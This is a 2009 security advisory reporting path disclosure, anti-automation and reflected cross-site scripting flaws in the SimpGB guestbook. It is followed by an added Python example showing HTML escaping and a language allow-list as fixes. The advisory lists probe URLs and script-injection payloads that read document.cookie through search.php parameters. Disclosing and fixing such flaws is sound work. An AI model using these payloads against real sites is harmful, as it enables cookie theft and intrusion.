Computer Security
[EN] securityvulns.ru

From:MustLive <mustlive_(at)_websecurity.com.ua>
Date:19.11.2009
Subject:Vulnerabilities in SimpGB

Hello 3APA3A!

I want to warn you about security vulnerabilities in SimpGB.

These are Full path disclosure, Insufficient Anti-automation and
Cross-Site Scripting vulnerabilities.

Full path disclosure:

http://site/admin/index.php?lang=1

http://site/admin/pwlost.php?lang=1

http://site/admin/usered.php?lang=1&mode=comment&input_entrynr=44&entrylang=en

Insufficient Anti-automation:

http://site/admin/usered.php?lang=en&mode=comment&input_entrynr=44&entrylang=en

Login and password are fixed and are set on the page.

XSS:

http://site/search.php?searchvalues=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/search.php?category=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

SimpGB V1.37.3 and previous versions (and possibly later versions) are
vulnerable.

I mentioned these vulnerabilities on my site
(http://websecurity.com.ua/3460/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
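The two fixes a maintainer would apply for the issues in this post, as an added example that is not SimpGB's code or MustLive's: a stand-in for the search page that reflects `searchvalues` once unescaped (the reported behaviour) and once HTML-escaped, and an allow-list check for the `lang` parameter so an unexpected value such as `lang=1` never reaches a file include that could print a PHP warning with the absolute install path. The function names, the allowed-language set and the HTML skeleton are assumptions; the only page-specific value is the search URL quoted in the advisory.

```python
"""Defender-side illustration of the SimpGB search.php XSS and the lang=1 path
disclosure.  Added example, not project code: the rendering functions and the
ALLOWED_LANGS set are assumptions, the advisory URL is taken from the post."""
import html
from urllib.parse import parse_qs, urlsplit

# Search URL quoted in the advisory; the query string URL-decodes to
#   "><script>alert(document.cookie)</script>
ADVISORY_URL = ("http://site/search.php?searchvalues=%22%3E%3Cscript%3Ealert"
                "(document.cookie)%3C/script%3E")

# Assumption: the language packs the installation actually ships with.
ALLOWED_LANGS = {"en", "de"}


def query_params(url):
    """Return the first value of every query parameter, URL-decoded."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {key: values[0] for key, values in qs.items()}


def render_search_vulnerable(params):
    """Reflects the search term into a value attribute without any encoding,
    which is what lets the quote in the payload close the attribute."""
    term = params.get("searchvalues", "")
    return '<input name="searchvalues" value="%s">' % term


def render_search_hardened(params):
    """Same markup, but the term is HTML-escaped (quote=True also encodes
    the double quote) before it is placed inside the attribute."""
    term = html.escape(params.get("searchvalues", ""), quote=True)
    return '<input name="searchvalues" value="%s">' % term


def contains_injected_markup(rendered):
    """True when a literal <script tag reached the page, i.e. the reflected
    value escaped the attribute it was supposed to stay inside."""
    return "<script" in rendered.lower()


def language_or_default(params, default="en"):
    """Accept ``lang`` only from the allow-list; anything else (``1`` in the
    advisory's URLs) falls back to the default instead of being used to build
    an include path whose failure would print the install directory."""
    lang = params.get("lang", default)
    return lang if lang in ALLOWED_LANGS else default


if __name__ == "__main__":
    params = query_params(ADVISORY_URL)
    print("vulnerable:", render_search_vulnerable(params))
    print("hardened:  ", render_search_hardened(params))
    print("lang=1 ->", language_or_default({"lang": "1"}))
```

The same `html.escape(..., quote=True)` treatment applies to the `category` parameter, which the post reports as reflected in the same way; the `lang` allow-list also covers the `pwlost.php` and `usered.php` URLs, since all three path-disclosure cases use the same parameter.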

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod